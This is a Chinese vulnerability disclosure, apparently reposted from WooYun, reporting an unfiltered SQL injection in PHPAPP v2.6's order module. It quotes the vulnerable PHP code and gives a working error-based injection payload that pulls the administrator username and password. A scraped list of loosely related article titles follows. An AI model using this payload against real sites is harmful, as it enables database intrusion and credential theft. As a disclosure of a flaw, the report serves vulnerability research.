php member limit,PHPAPP注入第十枚(未过滤)
### 简要描述:
PHPAPP注入第十枚(未过滤)
### 详细说明:
在wooyun上看到了有人提了PHPAPP的漏洞: http://wooyun.org/bugs/wooyun-2010-055604,然后去官网看了看,前几天刚有更新,就在官网下了PHPAPP最新的v2.6来看看(2014-12-11更新的)。
PSOT注入点:wwww.xxx.com/member.php?app=48&op=4&action=1, 存在漏洞的文件在/phpapp/apps/order/member_phpapp.php
随意注册个账号即可测试
来看看漏洞是如何产生的/phpapp/apps/order/member_phpapp.php
```
if($this->GET['op']==4){
if($this->POST['Submit']){
$content=$this->POST['content'];
$oid=intval($oderid);
$this->Update('task_order',array('content'=>$content),array()," WHERE oid='$oid'");
//文件
$files=$this->UploadFile();
if($files){
foreach($files as $fid){
$this->Insert('apps_file',array('appid'=>$this->app,'fid'=>$fid,'uid'=>$this->uid,'id'=>$oid,'type'=>3),array());
}
$this->ReplaceFileContent($files,'task_order',$content," WHERE oid='$oid' ");
}
echo '上传成功!';
echo $this->CloseNowWindows('#loading',1);
}
}
```
用户提交的content 没有经过过滤,拼接了sql语句,造成了注入。
Phpapp可以显错,那就用error-based blind进行注入。
Pyload:(POST提交)
```
Submit=1&content=1' or (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(0x23,username,0x23,password) from phpapp_member limit 0,1))a from phpapp_member group by a)b) or'
```
注入成功,管理员用户名及密码如下图中所示:
[](https://images.seebug.org/upload/201412/23235747caddfdfa3a066964a8ef3c61532fad5c.jpg)
### 漏洞证明:
见 详细说明
php member limit,PHPAPP注入第十枚(未过滤)相关推荐
- php充值注入,PHPAPP注入第二枚(漏洞打包)
### 简要描述: PHPAPP注入第二枚(漏洞打包) ### 详细说明: 在wooyun上看到了有人提了PHPAPP的漏洞: http://wooyun.org/bugs/wooyun-2010-0 ...
- Limit SQL注入
Limit SQL注入 1. SQL注入介绍 2. Limit注入PHP代码 3. Limit注入测试 4. 代码漏洞修复 1. SQL注入介绍 SQL注入介绍:SQL注入介绍 注入产生原因: ...
- 山东科技大学c语言完全题库,“山东科技大学十大未解之谜”之完全解答
"山东科技大学十大未解之谜"之完全解答 (2012-04-24 13:53:36) 标签: 娱乐 当我还是一枚小正太刚刚进入山科大的时候,我就看到过这些未解之谜,现在每每看到童鞋们 ...
- rust月球服务器名字_月亮的十大未解之谜
关于月亮的十大未解之谜至今仍然无法解开,月亮未解之谜是人类科学的一大探索,古往今来,为了探索月亮的奥秘,人类付出了巨大的努力.月亮的十大未解之谜你都有了解过吗?今天小编给大家准备了月亮的十大未解之谜. ...
- 2017互联网十大未解之谜,你能回答几个?
0关注「实验楼」,每天分享一个项目教程 互联网行业发生许多重大事件,比如微信小程序上线.顺丰菜鸟互撕.共享单车接连倒闭.乐视危机发酵.无人超市崛起.求职少年李文星之死.京东腾讯入股唯品会等.在互联网的 ...
- 文化中国 系列十:未归类系列
系列十:未归类系列 21.[文化中国视频讲座][赵启光][文化中国]老子的智慧人生 完整性说明:10集完整. [视频点播及迅雷下载][赵启光][老子的智慧人生]1 神秘的老子 [视频点播及迅雷下载][ ...
- mysql limit sql注入_LIMIT子句中的盲 SQL注入漏洞利用
原文:https://www.noob.ninja/2019/07/exploiting-tricky-blind-sql-injection.html 前言 嘿!有好长时间没有更新过博客了,不知道大 ...
- limit 后注入_聊一聊 SQLMAP 在进行 sql 注入时的整个流程
本文作者:sher10ck(信安之路核心成员) 很多小伙伴在发现或者判断出注入的时候,大多数选择就是直接上 sqlmap,结果往往也不尽人意,于是就有想法来写写 sqlmap 从执行到判断注入,到底发 ...
- php member limit,php 安全有关问题
php 安全问题 做web开发,相信搭建都知道一些安全基本知识,"千万不能相信客户端数据".而php又是一种弱类型语言.很多人在开发过程中忽略了类型转换,参数过滤直接量成不可估量的 ...
最新文章
- linux系统上tomcat启动正常,但浏览器无法访问
- 大理大学日常作业计算机基础知识,大理学院成人高等教育计算机应用基础课程作业题及答案...
- Samba服务器如何与Windows 95共享?
- 一个通用数据库操作组件DBUtil(c#)、支持SqlServer、Oracle、Mysql、postgres、SQLITE
- windows查询每个线程占用的内存_C#多线程
- 极简代码(七)—— SNR
- imu 里程计融合_多传感器融合 RLINS概述
- python+selenium自动化测试环境搭建步骤(selenium环境搭建)-绝不浪费您的时间
- (Python)计算器的设计与实现
- Java调用第三方http接口的常用方式
- vue axois 封装请求 | vue 解决跨域问题
- html语言什么时候加引号,什么时候冒号后面不用引号
- SwiftUI内功之如何设计Struct和Class不要和陌生人说话
- 11_传智播客iOS视频教程_NS前缀和@符号
- POI 写word,添加标题,表格,图片,自动生成目录,合并单元格
- 搭建本地 Protractor 运行环境
- QNX微内核RTOS
- 敏捷运维的实操 -- 迭代内工作量
- js把数据导出成excel的中文乱码问题解决
- c语言循环计算分式加减乘除混合运算,计算()_分式的加减乘除混合运算及分式的化简_中学题库-沪江中学学科网...
热门文章
- Leetcode 104.二叉树的最大深度 (每日一题 20210625)
- MATLAB问题解决方案- Matlab出现报错:​‘***‘不是内部或外部命令,也不是可运行的程序或批处理文件
- 贝叶斯学习--极大后验概率假设和极大似然假设
- Python开发工具PyCharm个性化设置备份
- 电压越低采集的ad值反而变大_80多条关于AD转换设计的经验总结
- python 统计list中各个元素出现的次数
- 为什么Servlet程序的init(ServletConfig config)中需要调用父类的init方法
- elasticSearch6源码分析(5)gateway模块
- EMR、EHR和PHR的定义与对比
- 在线支付之风控系统架构选型